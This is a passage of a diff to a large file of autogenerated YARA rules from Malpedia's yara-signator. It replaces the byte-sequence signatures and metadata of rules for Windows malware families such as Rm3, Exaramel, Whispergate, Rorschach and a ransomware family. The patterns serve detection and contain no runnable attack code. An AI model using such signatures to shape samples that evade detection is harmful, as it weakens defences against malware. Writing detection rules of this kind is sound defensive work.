+		$sequence_0 = { 85f6 7e26 8be8 8d831c020000 8bd8 }
+		$sequence_1 = { 5a 0f45d0 8bce e8???????? }
+		$sequence_2 = { 8bf0 85f6 746d 8b470c 25fffeffff 89460c 8b4714 }
+		$sequence_3 = { 8b36 4a 85f6 75f5 }
+		$sequence_4 = { 8bcf 42 e8???????? 85c0 741c 85db 7407 }
+		$sequence_5 = { 8bc6 5e c3 8a01 3c30 7c0c }
+		$sequence_6 = { 46 33c9 803a2d 7504 }
+		$sequence_7 = { 8b4e18 8bd5 e8???????? 85c0 }
+		$sequence_8 = { 896c240c 8bda 57 83feff 7509 8bcb e8???????? }
+		$sequence_9 = { 88542412 80e380 88542411 8ae2 }
 
 	condition:
-		7 of them and filesize < 1146880
+		7 of them and filesize < 417792
 }
-rule MALPEDIA_Win_Rm3_Auto : FILE
+rule MALPEDIA_Win_Cycbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b9c899fd-24b6-544d-a199-56585ec67459"
+		id = "0739459b-9989-5273-9ccc-a0e809393001"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rm3"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rm3_auto.yar#L1-L368"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cycbot_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "1f5fb30680a7291833cb3efcb87bc5516507b42236b00016cdde1fb7cc527979"
+		logic_hash = "5d47f4f5e3abd3b5df89c0d09b456bd0060fa6da83993d889b58fda1585abda3"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -136746,62 +137312,32 @@ rule MALPEDIA_Win_Rm3_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4508 3b460c 7247 8b7938 }
-		$sequence_1 = { 8b413c 8d5418ff eb0a 8b4138 8b5608 8d5410ff 48 }
-		$sequence_2 = { 0fb74106 8365f800 53 8945fc 0fb74114 56 }
-		$sequence_3 = { 85c0 7505 3945fc 759f }
-		$sequence_4 = { 8b7938 8b4608 8b513c 8b5e10 8d4438ff }
-		$sequence_5 = { 56 57 8d740818 8b4508 }
-		$sequence_6 = { 03c2 394508 7303 8975f8 }
-		$sequence_7 = { 897104 8b4808 ff7004 034c240c }
-		$sequence_8 = { 894510 56 8bc3 8d8d68ffffff 8bd6 e8???????? 2907 }
-		$sequence_9 = { 8b4514 e8???????? 8b5508 57 8bc3 8d8d58feffff }
-		$sequence_10 = { 8b3d???????? 8365fc00 8d45fc 50 6a00 }
-		$sequence_11 = { 897df8 e8???????? 8b4d0c 57 8bc6 8d9558feffff }
-		$sequence_12 = { 8bec 51 8365fc00 56 8d4508 50 }
-		$sequence_13 = { e8???????? 2bf3 89750c 0f88b3000000 8d3c1e 8dbcbd58feffff 837dfcff }
-		$sequence_14 = { ff750c 8d8d6cfeffff 50 e8???????? 8d8578ffffff 50 8bc6 }
-		$sequence_15 = { 8d9568ffffff e8???????? 85c0 7c15 ff4510 }
-		$sequence_16 = { 41bc01000000 eb07 3d002f0000 750c }
-		$sequence_17 = { 8d480f e8???????? 448b4f20 4c8b4728 }
-		$sequence_18 = { 488bd7 b9a63eff51 e8???????? 4885c0 7423 4c8d442448 33d2 }
-		$sequence_19 = { 33d2 41b80c030000 ff15???????? 4885c0 4c8be0 }
-		$sequence_20 = { 4883c604 03f8 0fb6442431 443be0 72cf }
-		$sequence_21 = { 448d443616 33d2 ff15???????? 4885c0 488bf0 0f84bd000000 488bcb }
-		$sequence_22 = { 8b01 4183c001 4883c104 48014268 }
-		$sequence_23 = { 4881ecc0000000 488b0d???????? 418bd8 8bfa }
-		$sequence_24 = { 83c404 8b0d???????? 50 8b85d4fbffff 50 6a17 }
-		$sequence_25 = { 8b8500ffffff 8a8c0574ffffff 8a940556ffffff 28ca 88940556ffffff 83c001 }
-		$sequence_26 = { 898d64ffffff e8???????? 8d45dc 8b30 8b7804 8b5808 }
-		$sequence_27 = { e8???????? 8b45b4 8b483c 890c24 c744240400000000 8b4db0 }
-		$sequence_28 = { 8945b8 894db4 8955b0 897dac 8975a8 0f84b5000000 }
-		$sequence_29 = { 898d6cffffff 899d68ffffff 89bd64ffffff 898560ffffff e9???????? }
-		$sequence_30 = { 8b45a0 01d8 8b5924 89855cffffff 89d8 }
-		$sequence_31 = { 8b8d6cffffff 894c2404 898558ffffff e8???????? }
-		$sequence_32 = { 89462c 890c24 c744240400000000 8955d0 e8???????? }
-		$sequence_33 = { 898558ffffff 89d8 c1e81f c1eb1d 83e301 }
-		$sequence_34 = { 8b15???????? 8985e8fdffff 898de4fdffff ffd2 }
-		$sequence_35 = { eb16 8a8563ffffff a801 755c eb00 31c0 }
-		$sequence_36 = { c744240400000000 8955d4 e8???????? 8d0d96318702 }
-		$sequence_37 = { 8985e8fbffff ffd1 8b0d???????? 6a00 6800000080 6a00 6a00 }
-		$sequence_38 = { 8b3e 83c618 81ff50450000 0f44d6 8b7580 81ff50450000 89c7 }
-		$sequence_39 = { 8b4870 894de0 8b4874 894de4 8b4868 }
+		$sequence_0 = { e9???????? be04010000 56 8d85e8feffff 50 68???????? ff15???????? }
+		$sequence_1 = { e8???????? 59 8945f0 3bc3 7415 ffb60c010000 8b4d0c }
+		$sequence_2 = { 899c2454020000 ff15???????? 399c2450020000 7423 6aff ffb42454020000 ffd6 }
+		$sequence_3 = { 740f 8b0b 8b16 51 52 50 e8???????? }
+		$sequence_4 = { eb30 8d51ff 3bc2 7322 8d9b00000000 8b8c85ccfaffff 898c85c8faffff }
+		$sequence_5 = { 89b5e8feffff e8???????? 83c40c 53 6a1a 8d85f0feffff 50 }
+		$sequence_6 = { 832000 eb26 ffb5d4eeffff e8???????? 59 ffb5cceeffff ff15???????? }
+		$sequence_7 = { 8b8d7cffffff 83c404 51 33f6 e8???????? 83c404 8bc6 }
+		$sequence_8 = { 8d45e8 50 56 e8???????? 83c408 85c0 750a }
+		$sequence_9 = { e8???????? ffb57cdeffff 8bf0 e8???????? 59 89b57cdeffff 8b9584deffff }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 1163264
 }
-rule MALPEDIA_Win_Remy_Auto : FILE
+rule MALPEDIA_Win_Exaramel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9e3d091c-9c3e-5358-821c-2201f723e147"
+		id = "35622950-7b6c-5e19-8133-d0f2264aa9e8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.remy_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.exaramel_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "75f06668797d3499803b9fa9b8dc61118625be3fbfdaf403e38706d03959bd0b"
+		logic_hash = "18c202b1bcb977a24c7c95e5ee5eaa9ad9563136df2ac39652d73a4b9f53b5e1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136815,32 +137351,32 @@ rule MALPEDIA_Win_Remy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 64a300000000 8b4508 8bf9 8b4d0c 89442428 33c0 }
-		$sequence_1 = { 8b06 8995b8efffff 8b5608 898db0efffff 8d8d38dfffff 8985bcefffff 8995c0efffff }
-		$sequence_2 = { 83791810 8d4104 7202 8b00 8b5120 52 50 }
-		$sequence_3 = { e8???????? c645fc01 8b08 8bb564ffffff 8d41f0 83c6f0 3bc6 }
-		$sequence_4 = { 2bc6 83e808 50 8d8d54ffffff 8d5e08 51 }
-		$sequence_5 = { 8b4b04 4e 833cb100 7517 6a10 e8???????? 83c404 }
-		$sequence_6 = { 8b06 50 83c604 56 8b74244c 56 e8???????? }
-		$sequence_7 = { 8d8d00ffffff 8bd6 e8???????? 83c408 3bc3 8b8500ffffff 0f85ce070000 }
-		$sequence_8 = { 8d4dc8 51 6a08 68ffff0000 56 897dc8 ff15???????? }
-		$sequence_9 = { 8b4210 83c7f0 89642448 89642448 ffd0 395f0c 8d4f0c }
+		$sequence_0 = { 8d85d8faffff 50 ff15???????? 85c0 0f84fd000000 68???????? 8d85d8faffff }
+		$sequence_1 = { 8945fc 53 8b5d0c 8d85f0fdffff }
+		$sequence_2 = { 56 56 50 6809040000 }
+		$sequence_3 = { e8???????? 83c404 c70600000000 33c0 5f 5e }
+		$sequence_4 = { ff2485e84e4000 668b4604 83c704 83c304 668901 83c604 e9???????? }
+		$sequence_5 = { 8bff 55 8bec 8b4508 57 8d3c85e0e04100 8b0f }
+		$sequence_6 = { 6a00 6a01 6800000080 894dc0 8b4d10 50 894dc4 }
+		$sequence_7 = { c70600000000 740a b80b000280 5e }
+		$sequence_8 = { 3bf0 8b4508 0f47f9 85ff 740d 2bf0 8a0c06 }
+		$sequence_9 = { ffb5f0fdffff ff15???????? 50 e8???????? 68???????? 8d85f4fdffff 50 }
 
 	condition:
-		7 of them and filesize < 507904
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Nimgrabber_Auto : FILE
+rule MALPEDIA_Win_Ghostsocks_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3417f107-706b-5ec9-a82e-ecd192636787"
+		id = "a81e901b-dc82-5aba-9b0a-b793b5feee2d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimgrabber"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nimgrabber_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostsocks"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ghostsocks_auto.yar#L1-L148"
 		license_url = "N/A"
-		logic_hash = "d297cfdaadbf9a62a41740c1e9e183f352f7bffa358a9fd4217b0060da18e6ef"
+		logic_hash = "bfb13a4898f7d810671a9ba5dbd8796a5c6a94275321bb29cfaca043cafc81f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136854,32 +137390,38 @@ rule MALPEDIA_Win_Nimgrabber_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7c79 8b4500 85c0 0f8457040000 8b10 39da 0f862d040000 }
-		$sequence_1 = { e9???????? 8b4c2434 c70424???????? 89442438 894c2404 e8???????? 8b442438 }
-		$sequence_2 = { 891c24 ffd0 83ec2c 83f8ff 0f94c3 e9???????? 8bbc2498000000 }
-		$sequence_3 = { e8???????? 8b15???????? 89c3 8d7310 85d2 0f84ab010000 01f5 }
-		$sequence_4 = { 0f49fa 85c9 0f84c8000000 89ce 8b4904 89f2 89c8 }
-		$sequence_5 = { 894c2404 c70424???????? e8???????? c7470400000000 ba???????? 89f9 c7442408b0000000 }
-		$sequence_6 = { 0f8f2b0c0000 31c0 8b742474 85f6 781e 83fe5f 0f845e1a0000 }
-		$sequence_7 = { 56 89ce 53 83ec2c 8b19 89542410 85db }
-		$sequence_8 = { 83ec24 8b742430 8b7c2434 c744240429000000 c70424???????? e8???????? 8d4c241c }
-		$sequence_9 = { 89442404 8b442424 890424 e8???????? e9???????? 83e801 893424 }
+		$sequence_0 = { e8???????? 8b4c2408 8d41ff 8b542404 31db }
+		$sequence_1 = { e8???????? 8b4c240c 8401 8b442450 }
+		$sequence_2 = { e8???????? 8b4c2408 8b9424a0050000 8b1a }
+		$sequence_3 = { e8???????? 8b4c2408 8b942490000000 8d5a4c 895c2474 }
+		$sequence_4 = { e8???????? 8b4c240c 890f 8908 }
+		$sequence_5 = { e8???????? 8b4c240c 83f9ff 740d }
+		$sequence_6 = { e8???????? 8b4c240c 81f900ac0000 7416 }
+		$sequence_7 = { e8???????? 8b4c240c 85c9 0f842c010000 }
+		$sequence_8 = { e8???????? 89856068fcff 89956468fcff 8d8d1bc3faff }
+		$sequence_9 = { e8???????? 89856074fbff 89956474fbff a1???????? }
+		$sequence_10 = { e8???????? 8985605ffdff 8995645ffdff 0fb6856fd5faff }
+		$sequence_11 = { e8???????? 89856076fcff 89956476fcff 8b85d0adfdff }
+		$sequence_12 = { e8???????? 89856078fbff 89956478fbff 8b0d???????? }
+		$sequence_13 = { e8???????? 89856071fcff 89956471fcff a1???????? }
+		$sequence_14 = { e8???????? 89856059fcff 89956459fcff 8b851481fbff }
+		$sequence_15 = { e8???????? 89856077feff 89956477feff 8b8d647ffeff }
 
 	condition:
-		7 of them and filesize < 1238016
+		7 of them and filesize < 25016320
 }
-rule MALPEDIA_Win_Rorschach_Auto : FILE
+rule MALPEDIA_Win_Whispergate_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "11b24b2d-bfea-5a8c-988f-bea7ea32170c"
+		id = "268f4f00-7468-54d8-b348-346d201993cc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rorschach"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rorschach_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.whispergate_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "3819d2826273a95ad95ce552fb76b197f4eb30ddd0b4d089208f0442591f4b17"
+		logic_hash = "a494914334df13264ae7aa19a2f5e165c28339f35ad7afc6f2c9baf4d999ad12"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136893,32 +137435,32 @@ rule MALPEDIA_Win_Rorschach_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f30f6f440420 f30f6f0c28 660fefc8 f30f7f0c30 418d40f0 f30f6f440420 f30f6f0c28 }
-		$sequence_1 = { e8???????? 8885f6050000 b261 488d8d70050000 e8???????? 8885f7050000 33d2 }
-		$sequence_2 = { ff15???????? 85c0 7414 488b4c2438 4c8d442444 488d5570 ff15???????? }
-		$sequence_3 = { eb04 33c0 8bd8 b978110000 e8???????? 488bf8 48894540 }
-		$sequence_4 = { 488d4d28 e8???????? 884529 33d2 488d4d28 e8???????? 88452a }
-		$sequence_5 = { 488d8d00010000 e8???????? 88850f010000 33d2 488d8d00010000 e8???????? 888510010000 }
-		$sequence_6 = { e8???????? 488d8598070000 488985b80c0000 c6454069 b273 488d4d40 e8???????? }
-		$sequence_7 = { 48897820 488b05???????? 4833c4 488985f0020000 bae9030000 ff15???????? 488bf0 }
-		$sequence_8 = { e8???????? 8885d7060000 33d2 488d8dd0060000 e8???????? 8885d8060000 b26b }
-		$sequence_9 = { 8885f60b0000 b23c 488d8d300b0000 e8???????? 8885f70b0000 33d2 488d8d300b0000 }
+		$sequence_0 = { 89442404 8b4208 890424 e8???????? 85c0 7426 8b4b04 }
+		$sequence_1 = { 85d2 c7049100000000 75f2 31c0 }
+		$sequence_2 = { 83c101 84c0 8842ff 75f0 8b4508 890424 8b75d0 }
+		$sequence_3 = { e8???????? e9???????? c745c000000000 e9???????? 8903 8b5db8 85db }
+		$sequence_4 = { 83c41c c3 c705????????ffffffff dbe3 }
+		$sequence_5 = { 784f 891c24 e8???????? 85f6 }
+		$sequence_6 = { c7042400000000 e8???????? 8d5001 89542404 }
+		$sequence_7 = { 83ec0c 85c0 0f84a8000000 8b442438 }
+		$sequence_8 = { c1e004 e8???????? 29c4 c745e400000000 c745d400000000 }
+		$sequence_9 = { 89de 8d44240c 89c7 8945c8 0fb603 3c7f 7428 }
 
 	condition:
-		7 of them and filesize < 3921930
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Pykspa_Auto : FILE
+rule MALPEDIA_Win_Jolob_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f69b7ae8-9844-5edd-af39-3a24a60736b3"
+		id = "ef72678c-e4af-5ecd-a17f-38938f34b802"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pykspa_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jolob_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "debf44a0a6bbb12f51a3423f6d02332e02447168503a68de6d1e19702f8f8b56"
+		logic_hash = "6d14d1852edd7575113d6514e73e7231e52f26da3a40217ee521425b76e2e32f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136932,32 +137474,32 @@ rule MALPEDIA_Win_Pykspa_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 8bc3 e9???????? e8???????? e9???????? 8d85acfeffff }
-		$sequence_1 = { 8945fc 75df 5b c9 c3 56 8b742408 }
-		$sequence_2 = { 57 8935???????? e8???????? 56 ff35???????? a3???????? 50 }
-		$sequence_3 = { 6a00 56 53 e8???????? 83c410 8d4558 50 }
-		$sequence_4 = { 59 8bf8 59 8d45fc 50 57 ff15???????? }
-		$sequence_5 = { 80385c 7410 48 49 83f901 7ff4 80385c }
-		$sequence_6 = { e8???????? 59 ff75fc ff15???????? 32c0 5e }
-		$sequence_7 = { 56 57 ff15???????? 53 6a6f }
-		$sequence_8 = { e8???????? 59 5e 5b c3 8b4a04 8b520c }
-		$sequence_9 = { 59 8d7dbd 8845bc f3ab 7777 83fe05 7272 }
+		$sequence_0 = { ff75f0 8d45f8 50 ff7618 e8???????? 5f c9 }
+		$sequence_1 = { 881408 41 84d2 75f6 8d95fafeffff 8bc7 }
+		$sequence_2 = { 740b 50 ff15???????? 834b14ff c3 }
+		$sequence_3 = { 40 5f c9 c20800 8b06 83f8ff }
+		$sequence_4 = { 5f 8bc3 5b 64890d00000000 c9 c20400 53 }
+		$sequence_5 = { 34a3 8886de000000 8a86cf000000 34a6 8886df000000 83c610 56 }
+		$sequence_6 = { 83c004 83c704 83fe04 7ce4 33f6 }
+		$sequence_7 = { 75f8 8d442420 50 ff730c e8???????? 85c0 74c3 }
+		$sequence_8 = { 0fafc1 894634 ff15???????? 8bf8 897e40 3bfb }
+		$sequence_9 = { 8a5415e4 885405f4 40 46 3bc3 7ceb ff4d08 }
 
 	condition:
-		7 of them and filesize < 835584
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Bruh_Wiper_Auto : FILE
+rule MALPEDIA_Win_Tonerjam_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8004678f-c7f1-56db-b368-30e9334ba4b0"
+		id = "82fd263f-2277-5710-bde1-c5f381e7b3bb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bruh_wiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bruh_wiper_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonerjam"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tonerjam_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "26b32a2c0d923fc99fb91e4beb18e36e72d9c523fef8bdb0bb63ddd5fd11ff5a"
+		logic_hash = "099b04145c5c37971e7ea839a0239f9aa67c9ef01dc57a28edbabde3d3d1e624"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136971,32 +137513,32 @@ rule MALPEDIA_Win_Bruh_Wiper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c40c be01080000 0f1f8000000000 }
-		$sequence_1 = { 83ee01 75e3 8b4dfc 5f 5e }
-		$sequence_2 = { 8d45f4 57 50 ff15???????? ff15???????? }
-		$sequence_3 = { 68b40200c0 ffd6 8b4dfc 5f 33cd 5e }
-		$sequence_4 = { 6a00 8d85f8fdffff 50 6800020000 8d85fcfdffff 50 }
-		$sequence_5 = { 68???????? 57 ffd3 6800020000 8d85fcfdffff 6a00 }
-		$sequence_6 = { 50 ffd6 8bf0 8d45fb 50 6a00 6a01 }
-		$sequence_7 = { 6800200000 68???????? 57 ffd3 6800020000 8d85fcfdffff }
-		$sequence_8 = { e8???????? 83c40c be01080000 0f1f8000000000 6a00 }
-		$sequence_9 = { 50 ffd6 68???????? 68???????? 8bf8 }
+		$sequence_0 = { b902000000 cd29 488d0d1ee10100 e8???????? 488b442438 488905???????? 488d442438 }
+		$sequence_1 = { 488d3547500100 48895c2420 488d0593660100 483bd8 7419 483933 740e }
+		$sequence_2 = { ff15???????? 488b8dd00d0000 4833cd e8???????? 488b9df00d0000 488bb5f80d0000 }
+		$sequence_3 = { 41b808020000 e8???????? 660f6f15???????? 488d0513e40100 33ed 448bcd f30f6f40f0 }
+		$sequence_4 = { 488d9424e0000000 488d144a 482bc1 7432 4c8d0d32bc0100 b9feffff7f }
+		$sequence_5 = { 7474 83fb01 756a 8b0d???????? 48893d???????? e8???????? e8???????? }
+		$sequence_6 = { 4c8d4c2440 488bd0 4c89742420 488bcb 488bf0 ff15???????? 4c8d4c2460 }
+		$sequence_7 = { 48894604 b906000000 48898620020000 0fb7c0 66f3ab 488d3d18370100 482bfe }
+		$sequence_8 = { e8???????? 41b804010000 488d542420 33c9 }
+		$sequence_9 = { 85c9 7858 3b15???????? 7350 488bca 4c8d05d9de0000 83e13f }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 315392
 }
-rule MALPEDIA_Win_Heriplor_Auto : FILE
+rule MALPEDIA_Win_Apocalypse_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d711b4d9-3914-58b9-9b88-9214444e3dee"
+		id = "b5ccf1f6-f470-5408-b195-08329344ed8e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.heriplor_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.apocalypse_ransom_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "bf5971e2bb98e2180b60da71db38d7f4898a68723f2588a48c70334b337b7d93"
+		logic_hash = "18df20f7eebe1c78a082ce30f5a4491f9ac67772b997a33222fc4d85121626f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137010,32 +137552,32 @@ rule MALPEDIA_Win_Heriplor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c20c00 55 89e5 56 57 33c9 648b4130 }
-		$sequence_1 = { 40 5b 59 89ec }
-		$sequence_2 = { 8a08 84c9 740d 80c960 01cb c1e301 }
-		$sequence_3 = { 668b13 8b0491 01f8 5f 5e 89ec 5d }
-		$sequence_4 = { 89e5 51 53 33db 33c9 8b4508 }
-		$sequence_5 = { 85ff 7420 46 46 }
-		$sequence_6 = { 7407 83c204 43 43 ebe6 33d2 668b13 }
-		$sequence_7 = { 01fb 8b32 01fe 6a01 ff750c }
-		$sequence_8 = { 3b5d0c 7401 40 5b }
-		$sequence_9 = { 01f9 01fa 01fb 8b32 01fe 6a01 ff750c }
+		$sequence_0 = { 57 8bf8 6a3d 893d???????? ffd3 8bf0 }
+		$sequence_1 = { 50 8d8c2410040000 51 ff15???????? 8d442408 e8???????? }
+		$sequence_2 = { 0bd7 7479 56 8d44241c 68???????? 50 }
+		$sequence_3 = { 89442424 8b44241c 6a6d 50 c744243006000000 c74424346d000000 }
+		$sequence_4 = { ff15???????? 68???????? 8d84240c040000 50 ff15???????? 85c0 742f }
+		$sequence_5 = { e8???????? 6a6d 56 ff15???????? 8b3d???????? }
+		$sequence_6 = { 68???????? ff15???????? 8d542408 52 ff15???????? 83f8ff }
+		$sequence_7 = { 0bd7 7479 56 8d44241c 68???????? 50 ffd5 }
+		$sequence_8 = { 8d442410 50 68???????? 6802000080 ffd6 8d4c2414 }
+		$sequence_9 = { 6a01 6800000080 8d4c2440 51 ffd6 8bf8 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Unidentified_013_Korean_Malware_Auto : FILE
+rule MALPEDIA_Win_Fengine_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9565c5c7-2061-57e3-9feb-b946c3a86959"
+		id = "86d29f99-f72a-503a-9d9e-5f6528fd35ad"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_013_korean_malware_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fengine"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fengine_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "821fb0825aa17f5a4d3c05e9768273454f282d58ecf369f512d9a619a9aa5b99"
+		logic_hash = "478947e69dab969c41feba1f394b054f84256d37e12b1c78c512e724084a67ab"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137049,32 +137591,32 @@ rule MALPEDIA_Win_Unidentified_013_Korean_Malware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 b801000000 eb3f 53 }
-		$sequence_1 = { 57 8d442418 50 33ff 6a01 }
-		$sequence_2 = { 7304 8d44242c 8a1c38 0fb6cb 51 e8???????? }
-		$sequence_3 = { 68???????? 64a100000000 50 81ec44060000 a1???????? 33c4 89842440060000 }
-		$sequence_4 = { 8944240c eb08 c744240cf2030000 8b4c241c 51 ff15???????? 397c240c }
-		$sequence_5 = { 8b7c2418 8b6c2414 8908 8b0d???????? }
-		$sequence_6 = { 8b2d???????? 8d44240c 50 6800040000 8d4c241c }
-		$sequence_7 = { 43 803c337f 0f85f1feffff 33ff 5b 5d 3bf7 }
-		$sequence_8 = { 7419 8d542428 52 e8???????? }
-		$sequence_9 = { e8???????? 83c40c 33ff 8d9b00000000 8a543c14 8d5c2410 88542410 }
+		$sequence_0 = { 33ff c6041000 898df4efffff 85c0 }
+		$sequence_1 = { 75e5 8d85b8feffff 50 ff15???????? }
+		$sequence_2 = { e8???????? 83c408 85c0 750f c705????????02000000 }
+		$sequence_3 = { 897e70 6a43 58 668986b8000000 668986be010000 c74668d0154100 6a0d }
+		$sequence_4 = { 8d55cc 8bce c745cc8b85d4fe c745d0ffff8b70 }
+		$sequence_5 = { 53 8d4e04 6800080000 51 }
+		$sequence_6 = { e8???????? ebb4 c745e448294100 a1???????? eb1a c745e444294100 a1???????? }
+		$sequence_7 = { c1e706 8b048560514100 83c00c 03c7 50 ff15???????? 33c0 }
+		$sequence_8 = { 6a43 58 668986b8000000 668986be010000 c74668d0154100 }
+		$sequence_9 = { 8b5e24 c1e003 50 03fa 03da e8???????? }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 210944
 }
-rule MALPEDIA_Win_Dyepack_Auto : FILE
+rule MALPEDIA_Win_Blindingcan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3c6c274a-3d73-5c98-98aa-7fd5f4c3842b"
+		id = "465029b5-763a-56ed-b1de-dd91c2f1a7ca"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dyepack_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan"
